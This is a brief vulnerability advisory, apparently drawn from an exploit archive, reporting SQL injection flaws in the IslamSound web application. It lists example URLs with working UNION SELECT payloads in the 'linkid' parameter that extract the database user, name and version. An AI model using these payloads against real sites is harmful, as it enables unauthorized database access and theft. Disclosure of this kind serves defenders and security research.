source: https://www.securityfocus.com/bid/39880/info IslamSound is prone to multiple remote SQL injection vulnerabilities. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/sound.php?catid=2 sql http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8-- http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--